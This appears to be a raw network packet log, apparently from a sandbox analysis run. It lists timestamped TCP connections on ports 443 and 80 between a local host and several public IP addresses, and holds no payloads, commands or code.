                                                                                        Dec 18, 2024 02:10:13.652571917 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.663976908 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.664041042 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.664064884 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.677527905 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.677607059 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.677635908 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.691109896 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.691169024 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.691190004 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.714220047 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.714297056 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.714319944 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.727773905 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.727838993 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.727860928 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.732443094 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.732501984 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.732510090 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.752614021 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.752688885 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.752708912 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.752955914 CET4968080192.168.2.16192.229.211.108
                                                                                        Dec 18, 2024 02:10:13.757915974 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.757987976 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.757996082 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.768318892 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.768384933 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.768397093 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.797672987 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.797740936 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.797759056 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.802000999 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.802066088 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.802079916 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.816699982 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.816761017 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.816777945 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.821023941 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.821084976 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.821091890 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.823714972 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.823776007 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.823784113 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.833554029 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.833621979 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.833636045 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.845144987 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.845208883 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.845226049 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.847177982 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.847242117 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.847251892 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.854655981 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.854717016 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.854724884 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.862211943 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.862282038 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.862298012 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.867746115 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.867795944 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.867804050 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.875269890 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.875333071 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.875339985 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.882994890 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.883060932 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.883080006 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.890463114 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.890523911 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.890536070 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.917272091 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.917355061 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.917376041 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.919117928 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.919179916 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.919187069 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.924573898 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.924637079 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.924653053 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.925616980 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.925673962 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.925682068 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.928858995 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.928965092 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.928972006 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.935766935 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.935962915 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.935970068 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.943270922 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.943329096 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.943336964 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.950800896 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.950870037 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.950877905 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.960083961 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.960160017 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.960175037 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.989573956 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.989744902 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.989767075 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.990787983 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.990852118 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.990859985 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.995532036 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.995594025 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.995601892 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.997096062 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.997155905 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:13.997168064 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:13.999972105 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.000046015 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:14.000072002 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.008641005 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.008722067 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:14.008744955 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.009706974 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.009768009 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:14.009776115 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.012856960 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.012942076 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:14.012949944 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.016436100 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.016495943 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:14.016503096 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.021485090 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.021553040 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:14.021559954 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.025665998 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.025728941 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:14.025736094 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.036716938 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.036781073 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:14.036798000 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.037004948 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:14.037167072 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:14.037245989 CET49720443192.168.2.16142.250.181.65
                                                                                        Dec 18, 2024 02:10:14.037257910 CET44349720142.250.181.65192.168.2.16
                                                                                        Dec 18, 2024 02:10:18.890966892 CET49678443192.168.2.1620.189.173.10
                                                                                        Dec 18, 2024 02:10:23.144377947 CET49722443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:23.144486904 CET44349722172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:23.144588947 CET49722443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:23.144973993 CET49723443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:23.144999981 CET44349723172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:23.145056963 CET49723443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:23.145387888 CET49722443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:23.145421982 CET44349722172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:23.145665884 CET49723443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:23.145679951 CET44349723172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:23.357069016 CET4968080192.168.2.16192.229.211.108
                                                                                        Dec 18, 2024 02:10:24.371953011 CET44349722172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:24.372252941 CET49722443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.372308016 CET44349722172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:24.373292923 CET44349722172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:24.373384953 CET49722443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.374388933 CET49722443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.374423027 CET49722443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.374456882 CET44349722172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:24.374535084 CET49722443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.374562979 CET44349722172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:24.374615908 CET49722443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.374615908 CET49722443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.374619961 CET44349722172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:24.374665022 CET49722443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.375041008 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.375137091 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:24.375370979 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.375490904 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.375520945 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:24.378844023 CET44349723172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:24.379056931 CET49723443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.379070997 CET44349723172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:24.382615089 CET44349723172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:24.382715940 CET49723443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.383783102 CET49723443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.383826971 CET49723443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.383826971 CET49723443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.383871078 CET44349723172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:24.384047031 CET49723443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.384124994 CET49725443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.384169102 CET44349725172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:24.384249926 CET49725443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.384450912 CET49725443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:24.384458065 CET44349725172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:25.596296072 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:25.596602917 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:25.596666098 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:25.598332882 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:25.598408937 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:25.599395037 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:25.599488974 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:25.599627972 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:25.599646091 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:25.609426975 CET44349725172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:25.609689951 CET49725443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:25.609707117 CET44349725172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:25.613106966 CET44349725172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:25.613173008 CET49725443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:25.613621950 CET49725443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:25.613701105 CET44349725172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:25.642086029 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:25.655011892 CET49725443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:25.655026913 CET44349725172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:25.703011990 CET49725443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.345865011 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.346450090 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.346509933 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.346532106 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.346599102 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.346662998 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.347099066 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.354047060 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.354140997 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.354161978 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.361983061 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.362078905 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.362102985 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.402054071 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.402117014 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.450047970 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.465364933 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.514045000 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.538005114 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.541745901 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.541824102 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.541868925 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.549705029 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.549782038 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.549806118 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.557602882 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.557667017 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.557683945 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.565658092 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.565737963 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.565753937 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.579096079 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.579154015 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.579180956 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.581558943 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.581629992 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.581672907 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.589478970 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.589545965 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.589616060 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.605159998 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.605200052 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.605252028 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.605314970 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.605345964 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.605386019 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.605416059 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.605559111 CET49724443192.168.2.16172.67.214.93
                                                                                        Dec 18, 2024 02:10:26.605592012 CET44349724172.67.214.93192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.747205019 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:26.747235060 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.747299910 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:26.747663021 CET49727443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:26.747700930 CET44349727104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.747755051 CET49727443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:26.747991085 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:26.748008013 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:26.748219967 CET49727443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:26.748234034 CET44349727104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:27.970482111 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:27.970870018 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:27.970905066 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:27.972347021 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:27.972419977 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:27.972783089 CET44349727104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:27.973038912 CET49727443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:27.973063946 CET44349727104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:27.973432064 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:27.973535061 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:27.973683119 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:27.973692894 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:27.974704027 CET44349727104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:27.974776030 CET49727443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:27.975775003 CET49727443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:27.975857973 CET44349727104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:27.976098061 CET49727443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:27.976104975 CET44349727104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.026015043 CET49727443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:28.026016951 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.396908045 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.420325994 CET44349727104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.420485020 CET44349727104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.420557022 CET49727443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:28.420799971 CET49727443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:28.420816898 CET44349727104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.420825958 CET49727443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:28.420869112 CET49727443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:28.422478914 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:28.422497034 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.422575951 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:28.422822952 CET49728443192.168.2.16104.18.94.41
                                                                                        Dec 18, 2024 02:10:28.422837019 CET44349728104.18.94.41192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.441139936 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.516616106 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.516632080 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.516661882 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.516676903 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.516691923 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.516721010 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.516736031 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.516794920 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.630568027 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.630580902 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.630616903 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.630630970 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.630661011 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.630672932 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.630719900 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.676799059 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.676827908 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.676903963 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.676914930 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.676973104 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.805135012 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.805164099 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.805398941 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.805408001 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.805457115 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.828608990 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.828646898 CET44349726151.101.2.137192.168.2.16
                                                                                        Dec 18, 2024 02:10:28.828826904 CET49726443192.168.2.16151.101.2.137
                                                                                        Dec 18, 2024 02:10:28.828838110 CET44349726151.101.2.137192.168.2.16
